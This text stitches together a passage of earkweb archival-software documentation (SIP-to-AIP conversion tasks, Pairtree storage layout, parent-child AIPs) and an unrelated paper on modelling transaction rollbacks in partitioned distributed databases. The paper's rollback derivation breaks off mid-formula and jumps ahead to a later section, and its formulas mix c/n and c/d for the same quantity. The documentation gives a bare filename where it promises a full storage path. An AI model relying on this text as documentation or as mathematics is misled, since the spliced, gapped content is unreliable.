The "SIP to AIP conversion" is either started by handing the package over from the "SIP creation" process within *earkweb* by executing the "SIP Close" task, or the package can be uploaded using the "SIP to AIP conversion" sub-menu item "Upload SIP":
The TAR or ZIP container file of an SIP is uploaded together with the SIP delivery XML document from the local file system to the SIP reception area.
Note that the package must be in TAR or ZIP format and the basenames of the package file and delivery XML (METS format) file must be equal (e.g. PACKAGE.tar and PACKAGE.xml).
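The basename requirement for the package file and the delivery XML file can be checked with a few lines. This is an illustrative sketch, not earkweb’s actual upload validation:

```python
import os


def delivery_names_match(package_file, delivery_xml):
    """Check that e.g. PACKAGE.tar and PACKAGE.xml share the same basename."""
    pkg_base, pkg_ext = os.path.splitext(os.path.basename(package_file))
    xml_base, xml_ext = os.path.splitext(os.path.basename(delivery_xml))
    return (pkg_ext in (".tar", ".zip")
            and xml_ext == ".xml"
            and pkg_base == xml_base)
```

For example, `PACKAGE.tar` together with `PACKAGE.xml` passes the check, while `PACKAGE.tar` with `OTHER.xml` does not.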
### 6.2.1.1 SIP to AIP conversion tasks
The SIP to AIP conversion process interface allows executing SIP creation tasks:
- **SIPtoAIPReset** - Rollback to initial state (as after handover from SIP creation or uploading the SIP)
- **SIPDeliveryValidation** - Validate delivery (especially checksum information)
- **IdentifierAssignment** - Assign identifier
- **SIPExtraction** - Extract SIP
- **SIPRestructuring** - Restructure SIP according to AIP format
- **SIPValidation** - Validate SIP
- **AIPMigrations** - Do migrations according to predefined rules (e.g. PDF to PDF/A)
- **AIPCheckMigrationProgress** - Check if migrations are finished
- **CreatePremisAfterMigration** - Create PREMIS file after migrations have completed
- **AIPRepresentationMetsCreation** - Create representation METS files
- **AIPPackageMetsCreation** - Create AIP METS and PREMIS
- **AIPValidation** - Validate package
- **AIPPackaging** - Create package container file
- **AIPStore** - Store AIP package in file system storage area (pairtree storage)
- **AIPIndexing** - Index AIP
- **LilyHDFSUpload** - Upload AIP to public search server
##### 6.2.1.2 SIP to AIP conversion task execution
The tasks in the pull-down menu near the label "Tasks" appear in the logical order in which they should be executed.
The "SIP to AIP task/workflow execution" overview table shows the information entities of the package. Note that some information entities, such as the "identifier", might appear only after a specific task ("IdentifierAssignment" in this case) was executed.
- The "Process ID" is a UUID which corresponds to the name of the working area directory.
- The "Package name" is the name of the SIP which is the outcome of the current SIP creation process.
- The package "Identifier" is the PUID of the AIP. Although of type UUID in the reference implementation, this could be any other type of identifier, such as a DOI or PURL.
- The "Working area path" is a link which allows accessing the working area directory of the corresponding package to see the result of a task execution.
- The "Last task" shows the last task which was executed, e.g. "AIPValidation". The last task also determines the subsequent tasks which can be executed, because each task defines a list of accepted input tasks.
- The "Last change" is the date/time of the last modification (by a task).
- The "Process status" shows the consistency status of a package. If the process status shows the value "Success (0)" together with a green "check mark" symbol, then the status of the package is consistent. If an error occurred during processing, the process status shows the value "Error (1)" together with a "warning triangle" symbol.
Selected information and error log messages appear in the "Process log" and "Error log" areas; more detailed information about the processing might be available in the earkweb processing log contained in the package.
Use the "SIPtoAIPReset" task to roll-back package processing to the initial state in case an error occurred during processing (after applying required modifications).
##### 6.2.1.3 Active SIP to AIP conversion processes
By accessing the sub-menu item "Active SIP to AIP conversion processes", an overview of open SIP to AIP conversion processes is shown. Each package is identified by the package name (column 'Package name'), which corresponds to the name of the SIP container. The process identifier is also used as the name of the working directory where information package transformations take place (column 'SIP creation working directory').
Depending on the last task that was executed, subsequent transformation tasks can be applied.
##### 6.2.1.4 Indexing and search in AIPs
The "AIPIndexing" task allows indexing the AIP TAR package created by the SIP to AIP conversion process. The AIP is indexed according to its location in the pairtree storage. In that way the search results can offer a link to directly render individual content items.
##### 6.2.1.5 AIPs in pairtree storage
The storage backend used in the Standalone Software Stack\(^{40}\) of *earkweb* is based on the Python-based *Pairtree File System* implementation\(^{41}\) of the *Pairtrees for Collection Storage* specification\(^{42}\). It is used to store the physical representation of the AIP in a conventional file system, as opposed to the Hadoop Distributed File System which is used in the Revised Cluster Software Stack described in Deliverable D6.3.
In summary, the *Pairtree* is a filesystem hierarchy for storing digital objects in which the unique identifier string of an object is mapped to a unique directory path, so that the file system location of the object can be derived from the identifier string. The identifier string is split into two-character segments, each of which becomes one directory level of the path; the object folder at the end of the path has, by definition, a name longer than two characters. Furthermore, the specification defines a mapping of special characters to a set of alternative characters in order to ensure file system level interoperability.
The following example will explain how the *Pairtree* storage method is used in the *earkweb* implementation.
According to the default *earkweb* configuration, the path to the storage directory in the file system is:
```
/var/data/earkweb/storage
```
The storage folder contains an empty file called “*pairtree_version0_1*” which specifies the version of the *Pairtree* specification.
The storage directory contains the root folder of the *Pairtree* storage:
```
/var/data/earkweb/storage/pairtree_root
```
Let us assume that an AIP has the following identifier
```
urn:uuid:6c496473-4e77-44f5-b387-25bffd362789
```
Following the method defined by the *Pairtree* specification, this identifier is mapped to the following path:
```
ur/n+/uu/id/+6/c4/96/47/3-/4e/77/-4/4f/5-/b3/87/-2/5b/ff/d3/62/78/9
```
and the actual AIP container file is stored in a “data” folder which represents the leaf node of the *Pairtree* file system hierarchy.
The leaf node contains one or possibly more sub-directories (5-digits fixed length zero-filled number) for the versions of the AIP.
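The identifier-to-path mapping used above can be sketched in a few lines of Python (an illustration of the splitting rule only; the real *Pairtree* library implements the full character-mapping table, of which only the colon substitution is shown here):

```python
def pairtree_path(identifier: str) -> str:
    """Map an identifier string to a Pairtree directory path: special
    characters are substituted (only ':' -> '+' is handled in this sketch),
    then the string is split into two-character segments, each of which
    becomes one directory level."""
    cleaned = identifier.replace(':', '+')
    segments = [cleaned[i:i + 2] for i in range(0, len(cleaned), 2)]
    return '/'.join(segments)
```

For the example identifier, `pairtree_path('urn:uuid:6c496473-4e77-44f5-b387-25bffd362789')` yields the path shown above.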
---
\(^{40}\) In contrast to the cluster software stack, the standalone software stack does not include a big data backend based on Apache Hadoop.
\(^{41}\) https://pypi.python.org/pypi/Pairtree
\(^{42}\) https://wiki.ucop.edu/display/Curation/PairTree?preview=/14254128/16973838/PairtreeSpec.pdf
The full path to the AIP file is as follows (to be read as a single line string):
```
+6c496473-4e77-44f5-b387-25bffd362789.tar
```
Note that the colon characters (":"), which are part of the URN identifier and separate the leading "urn" sequence from the namespace identifier ("uuid") and the latter from the namespace-specific string ("6c496473-4e77-44f5-b387-25bffd362789"), were mapped to the plus character ("+"). This is because the Pairtree character mapping rules apply to the filename of the physical container as well, to ensure file system interoperability.
The purpose of the Pairtree storage backend is to allow a large number of AIPs\(^{43}\) to be stored in a conventional file system, such as Network Attached Storage, for example, and allow fast access to individual files by directly reading content streams from the files stored in the TAR packaged AIP container files.
If the AIP is changed, because, for example, a new representation was added to the AIP, a new physical container will be created as a new version of the AIP. As a result, only the numerical version folder is incremented (00002), while the identifier of the intellectual entity remains the same (6c496473-4e77-44f5-b387-25bffd362789):
```
+6c496473-4e77-44f5-b387-25bffd362789.tar
```
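The version-folder convention (5-digit, zero-filled numbers) can be sketched as follows (an illustrative helper, not an earkweb function):

```python
def next_version_dir(existing_versions):
    """Given the version sub-directories of an AIP leaf node (e.g. ['00001']),
    return the name of the next 5-digit zero-filled version folder."""
    current = max((int(v) for v in existing_versions), default=0)
    return f"{current + 1:05d}"
```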
##### 6.2.1.6 Parent-child AIP relations
During AIP creation, it is possible to assign parent-child relationships between AIPs, as described in D4.4 part A. Figure 8 illustrates how the creation of packages governed by a parent-child relationship can be achieved:
1. The submission of a package is processed up to the point where the identifier of the parent AIP ("parentID") is created (operation "submitParentSIP").
2. This SIP to AIP creation process remains open until the last child AIP is created.
\(^{43}\) No concrete numbers will be given here about what a "large number of AIPs" means in this context, as the requirements regarding scalability of indexing and access procedures depend on various factors, such as the environment (hardware and network) and the type of collection data to be stored in the repository. It is a matter of evaluating the Standalone Software Stack using scalability tests to find out if it can cope with the given scalability requirements, or if the Cluster Software Stack is needed.
3. A sequence of child SIPs can then be submitted and created as child-AIPs by indicating the parent identifier (“parentID”) generated previously.
4. After the last child-AIP is processed, the parent-AIP is created (operation “createParentAIP”) by indicating which child-AIPs belong to the AIP (“childs”).
5. Finally, the consistency of the logical AIP composition is verified and the parent-AIP (“parent”) and all child-AIPs (“childs”) are stored (operation “storeAIP”).
Figure 8: Parent-child aggregation submission process
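The five steps above can be sketched as a toy workflow (hypothetical method names mirroring the operation names in Figure 8; `InMemoryRepo` is an illustrative stand-in, not the earkweb API):

```python
class InMemoryRepo:
    """Toy stand-in for the repository; real earkweb persists AIPs to storage."""
    def __init__(self):
        self.counter = 0
        self.stored = []

    def _new_id(self):
        self.counter += 1
        return f"id-{self.counter}"

    def submit_parent_sip(self, sip):
        # "submitParentSIP": open the process and mint the parentID
        return self._new_id()

    def submit_child_sip(self, sip, parent_id):
        # a child SIP is processed into a child AIP referencing parent_id
        return self._new_id()

    def create_parent_aip(self, parent_id, child_ids):
        # "createParentAIP": the parent records its "childs"
        return {"id": parent_id, "childs": child_ids}

    def store_aip(self, parent_aip, child_ids):
        # "storeAIP": verify consistency and persist parent and children
        self.stored.append(parent_aip)

def submit_aggregation(parent_sip, child_sips, repo):
    parent_id = repo.submit_parent_sip(parent_sip)
    child_ids = [repo.submit_child_sip(s, parent_id) for s in child_sips]
    parent_aip = repo.create_parent_aip(parent_id, child_ids)
    repo.store_aip(parent_aip, child_ids)
    return parent_id, child_ids
```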
EFFECTS OF DISTRIBUTED DATABASE MODELING ON EVALUATION OF TRANSACTION ROLLBACKS
Ravi Mukkamala
Department of Computer Science
Old Dominion University
Norfolk, Virginia 23529-0162.
ABSTRACT
Data distribution, degree of data replication, and transaction access patterns are key factors in determining the performance of distributed database systems. In order to simplify the evaluation of performance measures, database designers and researchers tend to make simplistic assumptions about the system. In this paper, we investigate the effect of modeling assumptions on the evaluation of one such measure, the number of transaction rollbacks. For a partitioned database system, we develop six probabilistic models and derive expressions for the number of rollbacks under each of these models. Essentially, the models differ in terms of the available system information. The analytical results obtained are compared to results from simulation. From this, we conclude that most of the probabilistic models yield overly conservative estimates of the number of rollbacks. The effect of transaction commutativity on system throughput is also grossly underestimated when such models are employed.
1. INTRODUCTION
A distributed database system is a collection of cooperating nodes, each containing a set of data items. In this paper, the basic unit of access in a database is referred to as a data item. A user transaction can enter such a system at any node. The node receiving a transaction, sometimes referred to as the coordinating or initiating node, undertakes the task of locating the nodes that contain the data items required by the transaction.
A partitioning of a distributed database (DDB) occurs when the nodes in the network split into groups of communicating nodes due to node or communication link failures. The nodes in each group can communicate with each other, but no node in one group is able to communicate with nodes in other groups. We refer to such a group as a partition. The algorithms which allow a partitioned DDB to continue functioning generally fall into one of two classes [Davidson et al., 1985]. Those in the first class take a pessimistic approach and process only those transactions in a partition which do not conflict with transactions in other partitions, ensuring consistent data when partitions are reunited. The algorithms in the second class allow every group of nodes in a partitioned DDB to perform new updates. Since this may result in dependent updates to items in different partitions, conflicts among transactions are bound to occur, and the databases of the partitions will clearly diverge. Therefore, these algorithms require a strategy for conflict detection and resolution. Usually, rollbacks are used as a means for preserving consistency; conflicting transactions are rolled back when partitions are reunited. These methods are called optimistic because they assume conflicts are rare; since coordinating the undoing of transactions is a very difficult task, they are used primarily in situations where the number of transactions in a partitioned database is large and the probability of conflicts among transactions is small.
In general, determining if a transaction that successfully executed in a partition is rolled back at the time the database is merged depends on a number of factors. Data items in the read-set and the write-set of the transaction, the distribution of these data items among the other partitions, access patterns of transactions in other partitions, data dependencies among the transactions, and semantic relation (if any) between these transactions are some examples of these factors. Exact evaluation of rollback probability for all transactions in a database (and hence the evaluation of the number of rolled back transactions) generally involves both analysis and simulation, and requires large execution times [Davidson 1982; Davidson 1984]. To overcome the computational complexities of evaluation, designers and researchers generally resort to approximation techniques [Davidson 1982; Davidson 1986; Wright 1983a; Wright 1983b]. These techniques reduce the computation time by making simplifying assumptions to represent the underlying distributed system. The time complexity of the resulting techniques greatly depends on the assumed model as well as evaluation techniques.
In this paper we are interested in determining the effect of distributed database models on the computational complexity and accuracy of the rollback statistics in a partitioned database. The balance of this paper is outlined as follows. Section 2 formally defines the problem under consideration. In Section 3, we discuss data distribution, replication, and transaction modeling. Section 4 derives the rollback statistics for one distribution model. In Section 5, we compare the analysis methods for five models and the simulation method for one model based on computational complexity, space complexity, and accuracy of the measure. Finally, in Section 6, we summarize the obtained results.
2. PROBLEM DESCRIPTION
Even though a transaction \( T_i \) in partition \( P_i \) may be rolled back (at merging time) by another transaction \( T_j \) in partition \( P_j \) due to a number of reasons, the following two cases are found to be the major contributors [Davidson 1982].
i. \( P_i \neq P_j \) and there is at least one data item which is updated by both \( T_i \) and \( T_j \). This is referred to as a write-write conflict.
ii. \( P_i = P_j \), \( T_i \) is rolled back, and \( T_i \) is a dependency parent of \( T_j \) (i.e., \( T_j \) has read at least one data item updated by \( T_i \), and \( T_i \) occurs prior to \( T_j \) in the serialization sequence).
The above discussion of reasons for rollback considers only the syntax of transactions (i.e., their read- and write-sets) and does not recognize any semantic relation between them. To be more specific, let us consider transactions \( T_i \) and \( T_j \) executed in two different partitions \( P_i \) and \( P_j \) respectively. Let us also assume that the intersection between the write-sets of \( T_i \) and \( T_j \) is non-empty. Clearly, by the above definition, there is a write-write conflict and one of the two transactions has to be rolled back. However, if \( T_i \) and \( T_j \) commute with each other, then there is no need to roll back either of the transactions at the time of the partition merge [Garcia-Molina 1983; Jajodia and Speckman 1988; Jajodia and Mukkamala 1990]. Instead, \( T_i \) needs to be executed in \( P_j \) and \( T_j \) needs to be executed in \( P_i \). The analysis in this paper takes this property into account.
In order to compute the number of rollbacks, it is also necessary to define some ordering (\( O(P) \)) on the partitions. For example, if \( T_i \) and \( T_j \) correspond to case (i) above and do not commute, it is necessary to determine which of the two is rolled back at the time of merging. Partition ordering resolves this ambiguity by the following rule: whenever two conflicting but non-commuting transactions are executed in two different partitions, the transaction executed in the lower-order partition is rolled back.
Since a transaction may be rolled back due to either (i) or (ii), we classify the rollbacks into two classes: Class 1 and Class 2 respectively. The problem of estimating the number of rollbacks at the time of partition merging in a partially replicated distributed database system may be formulated as follows.
Given the following parameters, determine the number of rolled back transactions in class 1 ($R_1$) and class 2 ($R_2$).
• n, the number of nodes in the database;
• d, the number of data items in the database;
• p, the number of partitions in the distributed system (prior to merge);
• t, the number of transaction types;
• $GD$, the global data directory that contains the location of each of the $d$ data items; the $GD$ matrix has $d$ rows and $n$ columns, and each entry is either 0 or 1;
• $NS_k$, the set of nodes in partition $k$, $\forall k = 1, 2, \ldots, p$;
• $RS_j$, the read-set of transaction type $j$, $j = 1, 2, \ldots, t$;
• $WS_j$, the write-set of transaction type $j$, $j = 1, 2, \ldots, t$;
• $N_{jk}$, the number of transactions of type $j$ received in partition $k$ (prior to merge), $j = 1, 2, \ldots, t$, $k = 1, 2, \ldots, p$;
• $CM$, the commutativity matrix that defines transaction commutativity. If $CM_{j_1 j_2} = 1$ then transaction types $j_1$ and $j_2$ commute; otherwise they do not commute.
The average number of total rollbacks is now expressed as $R = R_1 + R_2$.
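As a small illustration of case (i) combined with the partition-ordering rule (helper names are hypothetical, not from the paper):

```python
def write_write_conflict(ws_i, ws_j, commute):
    """Case (i): two transactions executed in different partitions are in
    write-write conflict iff their write-sets intersect and they do not
    commute."""
    return (not commute) and bool(set(ws_i) & set(ws_j))

def rolled_back(order_i, order_j):
    """Partition-ordering rule: of two conflicting, non-commuting
    transactions, the one in the lower-order partition is rolled back."""
    return 'T_i' if order_i < order_j else 'T_j'
```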
3. MODEL DESCRIPTION
As stated in the introduction, the primary objective of this paper is to investigate the effect of data distribution, replication, and transaction models on estimation of the number of rollbacks in a distributed database system.
To describe a data distribution-transaction model, we characterize it with three orthogonal parameters:
1. Degree of data item replication (or the number of copies).
2. Distribution of data item copies.
3. Transaction characterization
We now discuss each of these parameters in detail.
For simplicity, several analysis techniques assume that each data item has the same number of copies (or degree of replication) in the database system [Coffman et al. 1981]. Some other techniques characterize the degree of replication of a database by the average degree of replication of data items in that database [Davidson 1988]. Others treat the degree of replication of each data item independently.
Some designers and analysts assume some specific allocation schemes for data item (or group) copies (e.g., [Mukkamala 1987]). Assuming complete knowledge of data copy distribution ($GD$) is one such assumption. Depending on the type of allocation, such assumptions may simplify the performance analysis. Others assume that each data item copy is randomly distributed among the nodes in the distributed system [Davidson 1988].
Many database analysts characterize a transaction by the size of its read-set and its write-set. Since different transactions may have different sizes, these are either classified based on the sizes, or an average read-set size and average write-set size are used to represent a transaction. Others, however, classify transactions based on the data items that they access (and not necessarily on their size). In this case, transaction types are identified with their expected sizes and the group of data items from which these are accessed. An extreme example is a case where each transaction in the system is identified completely by its read-set and its write-set.
With these three parameters, we can describe a number of models. Due to the limited space, we chose to present the results for six of these models in this paper.
We chose the following six models based on their applicability in the current literature, and their close resemblance to practical systems. In all these models, the rate of arrival of transactions at each of the nodes is assumed to be completely known a priori. We also assume complete knowledge of the partitions (i.e. which nodes are in which partitions) in all the models.
Model 1: Among the six chosen models, this has the maximum information about data distribution, replication, and transactions in the system. It captures the following information.
• Replication: Data replication is specified for each data item.
• Data distribution: The distribution of data items among the nodes in the system is represented as a distribution matrix (as described in Section 2).
• Transactions: All distinct transactions executed in a system are represented by their read-sets and write-sets. Thus, for a given transaction, the model knows which data items are read, and which data items are updated. The commutativity information is also completely known and is expressed as a matrix (as described in Section 2).
Model 2: This model reduces the number of transactions by combining them into a set of transaction types based on commutativity, commonalities in data access patterns, etc. Since the transactions are now grouped, some of the individual characteristics of transactions (e.g. the exact read-set and write-set) are lost. This model has the following information.
• Replication: Average degree of replication is specified at the system level.
• Data distribution: Since the read- and write-set information is not retained for each transaction type, the data distribution information is also summarized in terms of average data items. It is assumed that the data copies are allocated randomly to the nodes in the system.
• Transactions: A transaction type is represented by its read-set size, write-set size, and the number of data items from which selection for read and write is made. Since two transaction types might access the same data item, it also stores this overlap information for every pair of transaction types. The commutativity information is stored for each pair of transaction types.
Model 3: This model further reduces the transaction types by grouping them based only on commutativity characteristics. No consideration is given to commonalities in data access pattern or differing read-set and write-set sizes. It has the following information.
• Replication: Average degree of replication is specified at the system level.
• Data distribution: As in model 2, it is assumed that the data copies are allocated randomly to the nodes in the system.
• Transactions: A transaction type is represented by the average read-set size and average write-set size. The commutativity information is stored for all pairs of transaction types.
Model 4: This model classifies transactions into three types: read-only, read-write, and others. Read-only transactions commute among themselves. Read-write transactions neither commute among themselves nor commute with others. The others class corresponds to update transactions that may or may not commute with transactions in their own class. This fact is represented by a commute probability assigned to it.
- **Replication**: Average degree of replication is specified at the system level.
- **Data distribution**: As in model 2, it is assumed that the data copies are allocated randomly to the nodes in the system.
- **Transactions**: Read-only class is represented by average read-set size. The read-write class is represented by average read-set and write-set sizes. The others class is represented by the average read-set size, average write-set size and the probability of commutation.
Model 5: This model reduces the transactions to two classes: read-only and read-write. Read-only transactions commute among themselves. The read-write transactions correspond to update transactions that may or may not commute with transactions in their own class. This fact is represented by a commute probability assigned to the class.
- **Replication**: Average degree of replication is specified at the system level.
- **Data distribution**: As in model 2, it is assumed that the data copies are allocated randomly to the nodes in the system.
- **Transactions**: Read-only class is represented by average read-set size. The read-write class is represented by average read-set and write-set sizes, and the probability of commutation.
Model 6: This model identifies read-only transactions and other update transactions. But these two types have the same average read-set size. Update transactions may or may not commute with other update transactions.
- **Replication**: Average degree of replication is specified at the system level.
- **Data distribution**: As in model 2, it is assumed that the data copies are allocated randomly to the nodes in the system.
- **Transactions**: The read-set size of a transaction is denoted by its average. For update transactions, we also associate an average write-set size and the probability of commutation.
Among these, model 1 is very general, and assumes complete information of data distribution (GD), replication, and transactions. Other models assume only partial (or average) information about data distribution and replication. Model 1 has the most information and model 6 has the least.
4. COMPUTATION OF THE AVERAGES
Several approaches offer potential for computing the average number of rollbacks for a given system environment; the most prominent methods are simulation and probabilistic analysis.
Using simulation, one can generate the data distribution matrix (GD) based on the data distribution and replication policies of the given model. Similarly, one can generate the different transactions (of different types) that are received at the nodes in the network. Since the partition information is completely specified, it is possible to determine, by searching the relevant columns of the GD matrix, whether a given transaction has been successfully executed in a given partition. Once all the successful transactions and their data dependencies have been identified, it is possible to identify the transactions that need to be rolled back at the time of merging. The generation and evaluation process may have to be repeated a sufficient number of times to get the required confidence in the final result.
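The generate-and-check part of such a simulation can be sketched as follows (a toy illustration under the random-allocation assumption; rollback detection among the successful transactions is omitted):

```python
import random

def generate_gd(d, n, c, rng):
    """Generate a random data distribution matrix GD (d rows, n columns):
    each data item receives c copies on distinct, randomly chosen nodes."""
    gd = [[0] * n for _ in range(d)]
    for item in range(d):
        for node in rng.sample(range(n), c):
            gd[item][node] = 1
    return gd

def successful(gd, read_set, partition_nodes):
    """A transaction succeeds in a partition iff every data item in its
    read-set has at least one copy on a node of that partition."""
    return all(any(gd[i][v] for v in partition_nodes) for i in read_set)
```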
Probabilistic analysis is especially useful when interest is confined to deriving the average behavior of a system from a given model. Generally, it requires less computation time. In this paper, we present detailed analysis for model 6, and a summary of the analysis for models 1-5.
4.1 Derivations for Model 6
This model considers only two transaction types: read-only (Type 1) and read-write (Type 2). Both have the same average read-set size of \( r \). A read-write transaction updates \( w \) of the data items that it reads. \( N_{1k} \) and \( N_{2k} \) represent the numbers of transactions of Types 1 and 2, respectively, received in partition \( k \). The average degree of replication of a data item is given as \( c \). The system has \( n \) nodes and \( d \) data items. The probability that two read-write transactions commute is \( m \).
Let us consider an arbitrary transaction \( T_i \) received at one of the nodes in partition \( k \) with \( n_k \) nodes. Since the copies of a data item are randomly distributed among the \( n \) nodes, the probability that a single data item is accessible in partition \( k \) is given by
\[
\alpha_k = 1 - \left( 1 - \frac{c}{n} \right)^{n_k}
\]
Since each data item is independently allocated, the expected number of data items available in this partition is \( d \alpha_k \). Similarly, since \( T_i \) accesses \( r \) data items (on the average), the probability that it will be successfully executed is \( \alpha_k^r \). From this, the numbers of successful transactions in partition \( k \) are estimated as \( \alpha_k^r N_{1k} \) and \( \alpha_k^r N_{2k} \) for Types 1 and 2 respectively.
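Numerically, the availability probability and the expected success counts can be sketched as follows (symbols as in the text; taking the per-node copy probability as \( c/n \) is an assumption of this sketch):

```python
def alpha(c, n, n_k):
    """Probability that a data item with c randomly placed copies among
    n nodes has at least one copy in a partition of n_k nodes."""
    return 1.0 - (1.0 - c / n) ** n_k

def expected_successes(c, n, n_k, r, arrivals):
    """Expected number of transactions with read-set size r that execute
    successfully in the partition: alpha_k^r * N."""
    return alpha(c, n, n_k) ** r * arrivals
```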
In computing the probability of rollback of \( T_i \) due to case (i), we are only interested in transactions that update a data item in the write-set of \( T_i \) and do not commute with \( T_i \). The probability that a given data item (updated by \( T_i \)) is not updated in another partition \( k' \) by a transaction that does not commute with \( T_i \) is given by
\[
\beta_{k'} = \left( 1 - \frac{w}{d \alpha_{k'}} \right)^{(1-m)\, \alpha_{k'}^{r} N_{2k'}}
\]
Given that a data item is available in \( k \), the probability that it is not available in \( k' \) is given as
\[
\gamma(k, k') = \frac{\left( 1 - \frac{c}{d} \right)^{n_{k'}} - \left( 1 - \frac{c}{d} \right)^{n_k + n_{k'}}}{\alpha_k}
\]
From here, the probability that a data item available in \( k \) is not updated by any other transaction in a higher-order partition is given as
\[
\delta_k = \prod_{k' > k} \left[ \gamma(k, k') + (1 - \gamma(k, k')) \beta_{k'} \right]
\]
The probability that transaction \( T_i \) is not in write-write conflict with any other non-commuting transaction of higher-order partitions is now given as (since \( T_i \) updates \( w \) data items)
\[
\mu_k = \delta_k^{w}
\]
From here, the number of transactions rolled back due to category (i) may be expressed as \( R_1 = \sum_{k} (1 - \mu_k)\, \alpha_k^{r} N_{2k} \).
To compute the rollbacks of category (ii), we need to determine the probability that \( T_i \) is rolled back due to the rollback of a dependency parent in the same partition. If \( T_j \) is a read-write transaction in partition \( k \), then the probability that \( T_j \) depends on \( T_i \) (i.e. read-write conflict) is given by:
Thus, model 6 is the least complex.
We discuss the space complexity of the six evaluation methods:
- Model 1 requires $O(dn)$ to store the data distribution matrix, $O(n)$ to store the partition information, $O(dt)$ to store the data access information, and $O(nt)$ to store the transaction information. It also requires $O(t^2)$ to store the commutativity information. Thus, it requires $O(nt + d n + t^2)$ space.
- Models 4-6 require similar information: $O(t)$ to store the average sizes of read- and write-sets of the transaction types, $O(nt)$ for transaction arrivals, $O(n)$ for partition information, and $O(t)$ for commutativity information. Thus, they require $O(nt)$ space.
- Model 3, in addition to the space required by models 4-6, also requires $O(t^2)$ for commutativity matrix. Thus it requires $O(nt + t^2)$ space.
- Model 2, in addition to the space required by model 3, also requires $O(t^2)$ space to store the data overlap information. Thus, it requires $O(nt + t^2)$ storage.
Thus, model 1 has the largest storage requirement and model 6 has the least.
#### 5.3 Evaluation of the Averages
In order to compare the effect of each of these models on the evaluation of the average rollbacks, we have run a number of experiments. In addition to the analytical evaluations for models 1-6, we have also run simulations with Model 1. The results from these runs are summarized in Tables 1-7. These tables report the number of transactions successfully executed before partition merge (Before Merge), the number of rollbacks due to class 1 ($R_1$), the rollbacks due to class 2 ($R_2$), and the transactions considered successful at the completion of the merge (After Merge). Obviously, the last quantity is computed from the earlier three. In all these tables, the total number of transaction arrivals into the system during partitioning is taken to be 65000, and each node is assumed to receive an equal share of the incoming transactions.
Table 1 summarizes the effect of number of partitions as measured with Models 1-6. Here, it is assumed that each of the data items in the system has exactly $c = 3$ copies.
The other assumptions in models 1-6 are as follows:
1. Model 1 considers 130 transaction types in the system. Each is described by its read- and write-sets and whether it commutes with the other transactions. 90 of the 130 are read-only transactions; the remaining 40 are read-write. Among the read-write transactions, 15 commute with each other, another 10 commute with each other, and the remaining 15 do not commute at all. The simulation run takes the same inputs but evaluates the averages by simulation.
2. Model 2 maps the 130 transaction types into 4 classes. To make the comparisons simple, the above four classes (90+15+10+15) are taken as four types. The data overlap is computed from the information provided in model 1.
3. Model 3, to facilitate comparison of results, considers the above 4 classes. This model, however, does not capture the data overlap information.
4. Model 4 considers three types: read-only, read-write that commute among themselves with some probability, and read-write that do not commute at all.
5. Model 5 considers read-only transactions with read-set size of 3 and read-write transactions with read-set size of 6. Read-write transactions commute with a given probability.
6. Model 6 only considers the average read-set size (computed as 4 in our case), the fraction of read-write transactions (40/130), and the average write-set size of a read-write transaction (2). The probability that any two transactions commute is taken to be 0.6.
From Table 1 it may be observed that:
- The analytical results from Model 1 are a close approximation of those from simulation.
- The average number of successful transactions prior to the merge is well approximated by all the models; Model 6 deviates the most.
- The difference in estimations of $R_1$ and $R_2$ is significant across the models. Model 1 is closest to the simulation, Model 6 has the worst accuracy, and Model 5, surprisingly, is somewhat better than Models 2, 3, 4, and 6.
- The estimation of $R_1$ from models 2-6 is about 50 times the estimation from Model 1, while the estimations from Model 1 and the simulation are quite close. From this, we can see that Models 2-6 yield overly conservative estimates of the number of rollbacks at the time of partition merge: while Model 1 estimated the rollbacks as 1200, Models 2-6 have approximated them as about 13000.
- This difference in estimations seems to exist even when the number of partitions is increased.
Table 2 summarizes the effect of number of copies on the evaluation accuracies of the models. It may be observed that
- The difference between evaluations from Model 1 and the others is significant at low ($c = 3$) as well as high ($c = 8$) values of $c$. Clearly, the difference is more significant at high degrees of replication.
- The case $p_1 = 4, p_2 = 6, c = 8$ corresponds to a case where each of the 500 data items is available in both partitions. This is also evident from the fact that all 65000 input transactions are successful prior to the merge.
- The results from the analysis of Model 1 are close to those from simulation.
Table 3 shows the effect of increasing the number of nodes from 10 (in Table 1) to 20. For large values of $n$, all the six models result in good approximations of successful transactions prior to merge. The differences in estimations of $R_1$ and $R_2$ still persist.
Table 4 compares models 5 and 6. While model 6 only retains average read-set size information for any transaction, model 5 keeps this information for read-only and read-write transactions separately. This additional information enabled model 5 to arrive at better approximations for $R_1$ and $R_2$. In addition, the effect of commutativity on $R_1$ and $R_2$ is not evident until $m \geq 0.99$. This is counterintuitive. The simplistic nature of the models is the real cause of this observation. Thus, even though these models have resulted in conservative estimates of $R_1$ and $R_2$, we cannot draw any positive conclusions about the effect of commutativity on the system throughput.
- The comments made above about the conservative nature of the estimates from models 5 and 6 also apply to model 2. These results are summarized in Table 5. Even though this model has much more system information than models 5 and 6, the results ($R_1$ and $R_2$) are not very different. However, the effect of commutativity can now be seen at $m \geq 0.95$.
- Having observed that the effect of commutativity is almost lost for smaller values of $m$ in models 2-6, we will now look at its effect with model 1. These results are summarized in Table 6. Even at small values of $m$, the effect of commutativity on the throughput is evident. In addition, it increases with $m$. This observation holds at both small and large values of $c$.
- In Table 7, we summarize the effect of variations in the number of copies. In Tables 1-6, we assumed that each data item has exactly the same number of copies. This assumption is most relevant to Model 1, so we only consider this model in determining the effect of copy variations on the evaluation of $R_1$ and $R_2$. As shown in the table, the effect is significant. As the variation in the number of copies increases, the number of successful transactions prior to merge decreases; hence, the number of conflicts is also reduced, which results in a reduction of $R_1$ and $R_2$. As long as the variations are not very significant, the differences are also not significant.
### 6. CONCLUSIONS
In this paper, we have introduced the problem of estimating the number of rollbacks in a partitioned distributed database system. We have also introduced the concept of transaction commutativity and described its effect on transaction rollbacks. For this purpose, the data distribution, replication, and transaction characterization aspects of distributed database systems have been modeled with three parameters. We have investigated the effect of six distinct models on the evaluation of the chosen metric. These investigations have resulted in some very interesting observations. This study involved developing analytical equations for the averages, and evaluating them for a range of parameters. We also used simulation for one of these models. Due to lack of space, we could not present all the obtained results in this paper. In this section, we summarize our conclusions from these investigations.
- Random data models that assume only average information about the system result in very conservative estimates of system throughput. One has to be very cautious in interpreting these results.
- Adding more system information does not necessarily lead to better approximations. In this paper, the system information is increased from model 5 to model 2. Even though this increases the computational complexity, it does not result in any significant improvement in the estimation of number of rollbacks.
- Model 1 represents a specific system. Here, we define the transactions completely. Thus it is closer to a real-life situation. Results (analytical or simulation) obtained from this model represent actual behavior of the specified system. However, results obtained from such a model are too specific, and can't be extended for other systems.
